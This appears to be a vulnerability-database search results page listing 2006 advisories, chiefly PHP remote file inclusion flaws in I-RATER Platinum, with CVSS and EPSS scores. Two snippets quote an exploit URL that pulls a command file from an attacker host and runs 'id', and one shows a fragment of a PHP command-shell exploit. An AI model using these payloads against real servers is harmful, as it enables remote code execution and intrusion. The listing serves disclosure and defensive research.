Lucene search
+L

7747 matches found

Zero Day Initiative
Zero Day Initiative
added 2006/05/10 12:0 a.m.32 views

Verisign I-Nav ActiveX Control Code Execution Vulnerability

This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of the Verisign i-Nav ActiveX control. User interaction is required to exploit this vulnerability in that the target must visit a malicious web page. The specific flaw exists within the...

9.3CVSS3.5AI score0.03254EPSS
Exploits0References1
Packet Storm
Packet Storm
added 2006/05/02 12:0 a.m.28 views

irater.txt

" ."target:" ."cmdshell:" ."cmd:" ."" .""; if !isset$POST'submit' echo $form; else $file = fopen "test.txt", "w+"; fwrite$file, ""; fclose$file; $file = fopen $target.$cmdshell, "r"; if !$file echo "Unable to get output.\n"; exit; echo $form; while !feof $file $line .= fgets $file, 1024.""; $tpos...

7.4AI score
Exploits0
NVD
NVD
added 2006/05/01 10:6 p.m.23 views

CVE-2006-2121

PHP remote file include vulnerability in admin/configsettings.tpl.php in I-RATER Platinum allows remote attackers to execute arbitrary code via a URL in the includepath parameter. NOTE: this is a different vector, and possibly a different vulnerability, than CVE-2006-1929...

5CVSS7.7AI score0.03792EPSS
Exploits1References5
Prion
Prion
added 2006/05/01 10:6 p.m.12 views

Design/Logic Flaw

PHP remote file include vulnerability in admin/configsettings.tpl.php in I-RATER Platinum allows remote attackers to execute arbitrary code via a URL in the includepath parameter. NOTE: this is a different vector, and possibly a different vulnerability, than CVE-2006-1929...

5CVSS8AI score0.06962EPSS
Exploits1References5
Cvelist
Cvelist
added 2006/05/01 10:0 p.m.29 views

CVE-2006-2121

PHP remote file include vulnerability in admin/configsettings.tpl.php in I-RATER Platinum allows remote attackers to execute arbitrary code via a URL in the includepath parameter. NOTE: this is a different vector, and possibly a different vulnerability, than CVE-2006-1929...

7.7AI score0.03792EPSS
Exploits1References5
CVE
CVE
added 2006/05/01 10:0 p.m.49 views

CVE-2006-2121

CVE-2006-2121 is a PHP remote file inclusion vulnerability affecting I-RATER Platinum, where an attacker can execute arbitrary code through a URL supplied in the include_path parameter in admin/config_settings.tpl.php. The NVD entry lists a MEDIUM base score (5.0) with network access and no authe...

5CVSS7.7AI score0.03792EPSS
Exploits1References5Affected Software1
Packet Storm
Packet Storm
added 2006/04/29 12:0 a.m.30 views

I-RATER.txt

Website : http://www.i-rater.com Risk : High Class : Remote References : http://www.securityfocus.com/bid/17623 Credits : B3g0k,Nistiman,Flot,Netqurd and all my friend Remote Code : http://www.site.com/admin/configsettings.tpl.php?includepath=http://www.evilrox.com/cmd.txt?&cmd=id...

7.4AI score
Exploits0
securityvulns
securityvulns
added 2006/04/29 12:0 a.m.30 views

[Kurdish Secure Advisory #1] I-RATER Platinum "Admin/configsettings.tpl.php" Remote File Include Vulnerability

Website : http://www.i-rater.com Risk : High Class : Remote References : http://www.securityfocus.com/bid/17623 Credits : B3g0k,Nistiman,Flot,Netqurd and all my friend Remote Code : http://www.site.com/admin/configsettings.tpl.php?includepath=http://www.evilrox.com/cmd.txt?&cmd=id...

0.2AI score
Exploits0
Exploit DB
Exploit DB
added 2006/04/28 12:0 a.m.24 views

I-RATER Platinum - 'Config_settings.TPL.php' Remote File Inclusion

source: https://www.securityfocus.com/bid/17731/info I-RATER Platinum is prone to a remote file-include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. An attacker can exploit this issue to include an arbitrary remote file containing...

7.4AI score
Exploits0
Prion
Prion
added 2006/04/20 6:6 p.m.18 views

Remote file inclusion

PHP remote file inclusion vulnerability in include/common.php in I-Rater Platinum allows remote attackers to execute arbitrary PHP code via a URL in the includepath parameter...

5CVSS7.7AI score0.06962EPSS
Exploits0References6
NVD
NVD
added 2006/04/20 6:6 p.m.28 views

CVE-2006-1929

PHP remote file inclusion vulnerability in include/common.php in I-Rater Platinum allows remote attackers to execute arbitrary PHP code via a URL in the includepath parameter...

5CVSS7.4AI score0.06962EPSS
Exploits0References6
Cvelist
Cvelist
added 2006/04/20 6:0 p.m.28 views

CVE-2006-1929

PHP remote file inclusion vulnerability in include/common.php in I-Rater Platinum allows remote attackers to execute arbitrary PHP code via a URL in the includepath parameter...

7.4AI score0.06962EPSS
Exploits0References6
CVE
CVE
added 2006/04/20 6:0 p.m.48 views

CVE-2006-1929

The vulnerability CVE-2006-1929 affects I-Rater Platinum: include/common.php is susceptible to a PHP remote file inclusion (RFI) via a URL provided in the include_path parameter. This leads to arbitrary PHP code execution on the affected system. The documented impact is remote code execution, wit...

5CVSS7.5AI score0.06962EPSS
Exploits0References6Affected Software1
exploitpack
exploitpack
added 2006/04/20 12:0 a.m.27 views

I-RATER Platinum - Common.php Remote File Inclusion

I-RATER Platinum - Common.php Remote File Inclusion source: https://www.securityfocus.com/bid/17623/info I-RATER Platinum is prone to a remote file-include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. An attacker can exploit this issue...

0.1AI score
Exploits0
securityvulns
securityvulns
added 2006/04/20 12:0 a.m.28 views

[SA19684] I-Rater Platinum "include_path" Parameter File Inclusion Vulnerability

TITLE: I-Rater Platinum "includepath" Parameter File Inclusion Vulnerability SECUNIA ADVISORY ID: SA19684 VERIFY ADVISORY: http://secunia.com/advisories/19684/ CRITICAL: Highly critical IMPACT: System access WHERE: From remote SOFTWARE: I-Rater Platinum http://secunia.com/product/9425/ DESCRIPTIO...

0.3AI score
Exploits0
Exploit DB
Exploit DB
added 2006/04/20 12:0 a.m.21 views

I-RATER Platinum - 'Common.php' Remote File Inclusion

source: https://www.securityfocus.com/bid/17623/info I-RATER Platinum is prone to a remote file-include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. An attacker can exploit this issue to include an arbitrary remote file containing...

7.4AI score
Exploits0
CVE
CVE
added 2006/03/24 2:0 a.m.53 views

CVE-2006-1377

The CVE-2006-1377 entry describes a Cross-site scripting (XSS) vulnerability in img.php for the applications EasyMoblog 0.5.1 and CoMoblog 1.1 , where an attacker can inject arbitrary web script or HTML via the i parameter. The vulnerability is triggered remotely and the impact stated is that the...

4.3CVSS5.7AI score0.05201EPSS
Exploits1References13Affected Software2
CERT
CERT
added 2006/03/22 12:0 a.m.31 views

Sendmail signal I/O race condition

Overview A race condition in Sendmail may allow a remote attacker to execute arbitrary code. Description Sendmail Sendmail is a widely used mail transfer agent MTA. Mail Transfer Agents MTA MTAs are responsible for sending an receiving email messages over the internet. They are also referred to a...

7.6CVSS7.6AI score0.28144EPSS
Exploits0References5
OpenVAS
OpenVAS
added 2005/11/03 12:0 a.m.50 views

i-mall.cgi

The script i-mall.cgi is installed. Some versions of this script are vulnerable to remote command exacution flaw, due to insuficient user input sanitization. A malicious user can pass arbitrary shell commands on the remote server through this script. OpenVAS Vulnerability Test $Id: i-mallcgi.nasl...

10CVSS1.1AI score0.12805EPSS
Exploits1References1
securityvulns
securityvulns
added 2005/09/05 12:0 a.m.42 views

[Full-disclosure] Microsoft Windows keybd_event validation vulnerability

Vulnerability: Microsoft Windows keybdevent validation vulnerability. Type:......... Design Flaw Vendor:....... Microsoft Impact:....... Local Privilege Elevation. Credits:...... AndrTarascaT4r @ Haxorcitos.comhttp://Haxorcitos.com .......I Lopez ilo @ reversing.org http://reversing.org...

0.1AI score
Exploits0
Rows per page
Query Builder